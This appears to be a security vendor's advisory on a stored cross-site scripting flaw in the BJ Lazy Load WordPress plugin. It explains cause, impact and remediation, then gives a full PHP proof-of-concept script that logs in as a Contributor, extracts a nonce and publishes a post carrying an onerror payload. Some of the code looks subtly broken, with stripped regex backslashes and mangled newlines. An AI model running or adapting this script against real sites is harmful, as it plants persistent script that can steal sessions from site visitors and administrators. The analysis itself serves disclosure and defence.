Atomic Edge analysis of CVE-2026-2300 (metadata-based):
This vulnerability is a Stored Cross-Site Scripting (XSS) found in the BJ Lazy Load plugin for WordPress, affecting all versions up to and including 1.0.9. The flaw exists in the filter_images() function which uses regex-based HTML processing (preg_replace) to modify img tag src attributes. Due to improper handling of HTML attribute boundaries, crafted content placed inside a class attribute value can be promoted to real DOM attributes after processing. This allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts that execute when users view affected pages. The CVSS score is 6.4, indicating medium severity with network attack vector, low privileges required, and changed scope.
The root cause is a classic CWE-79 vulnerability stemming from insecure regex-based HTML manipulation. The filter_images() function likely applies preg_replace with a pattern that captures src attributes for lazy loading but fails to properly escape or validate surrounding attribute values. When preg_replace processes an img tag containing a crafted class attribute like “x onerror=alert(1)”, the replacement pattern may incorrectly interpret the content between quotes as multiple attributes, promoting the onerror handler to a real HTML attribute. Atomic Edge research confirms this pattern of vulnerability is well-documented in WordPress plugins that attempt DOM manipulation through regex rather than using proper DOM parsing libraries. Since no source code diff is available, Atomic Edge analysis infers this behavior from the CWE classification and the description’s specific mention of regex processing and attribute boundary issues.
Exploitation requires an authenticated user with at least Contributor role access. The attacker crafts a post or page containing a custom HTML block with an img tag. The img tag includes a class attribute containing an XSS payload, such as class=”x onerror=alert(1)”. The lazy load plugin processes this via filter_images() and its preg_replace call. The regex replacement incorrectly interprets the spaces within the class value as attribute separators, promoting the onerror portion as a legitimate attribute. The payload executes when any user, including administrators, views the compromised page. The attack vector targets standard WordPress content creation functions, not specific AJAX endpoints, so exploitation happens through the normal post/page editor interface.
Remediation requires the plugin developers to replace the regex-based HTML processing with proper DOM parsing. The fix should use validated HTML processing methods like DOMDocument or wp_kses functions that correctly handle attribute boundaries. The replacement logic must ensure the regex preserves the integrity of existing attribute values, or better, avoid direct manipulation of HTML strings altogether. Since no patched version is available, site administrators should disable or remove the BJ Lazy Load plugin entirely.
Successful exploitation allows an attacker with low-level contributor privileges to inject persistent XSS payloads. These payloads execute in the context of any user visiting the infected page. The scope change in the CVSS vector indicates the injected script can affect resources beyond the vulnerable component. This can lead to session hijacking, credential theft, defacement, redirection to malicious sites, or further privilege escalation through admin session manipulation. The stored nature of the XSS means the attack affects multiple victims until the malicious content is removed from the database.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2300 - BJ Lazy Load <= 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom HTML Block
<?php
/**
* This PoC demonstrates exploitation of CVE-2026-2300.
* It requires valid WordPress credentials with Contributor-level or higher access.
* The attacker creates a post containing an img tag with a crafted class attribute
* that, after processing by the BJ Lazy Load plugin's filter_images() function,
* results in a stored XSS payload.
*/
// Configuration
$target_url = 'http://example.com'; // WordPress site URL
$username = 'attacker'; // WordPress username (Contributor+)
$password = 'password123'; // WordPress password
// Step 1: Authenticate and obtain cookies/nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
if (curl_error($ch)) {
die('Login failed: ' . curl_error($ch));
}
// Step 2: Get the admin page to extract a valid post creation nonce
$admin_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$admin_page = curl_exec($ch);
// Extract _wpnonce for post creation via AJAX
preg_match('//wp-admin/admin-ajax.php.*?_wpnonce=([a-f0-9]+)/', $admin_page, $matches);
if (!isset($matches[1])) {
// Fallback: try to get nonce from REST API
preg_match('/nonces*=s*'([a-f0-9]+)'/', $admin_page, $matches);
}
if (!isset($matches[1])) {
die('Could not extract nonce');
}
$nonce = $matches[1];
// Step 3: Create a new post using WP REST API
// The payload: an img tag with a crafted class attribute that will be misinterpreted
// Note: BJ Lazy Load processes content server-side, so we inject via block editor
$payload_img = '<img src="placeholder.jpg" class="x onerror=alert(1)" />';
$rest_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = array(
'title' => 'CVE-2026-2300 Test Post',
'content' => $payload_img,
'status' => 'publish'
);
$headers = array(
'Content-Type: application/json',
'X-WP-Nonce: ' . $nonce
);
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
$response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($response_code == 201) {
echo "[+] Post created successfully. Visit the new post to trigger XSS.n";
$response_data = json_decode($response, true);
echo "[+] Post URL: " . $response_data['link'] . "n";
} else {
echo "[-] Post creation failed with HTTP $response_coden";
echo "[-] Response: $responsen";
}
curl_close($ch);
?>
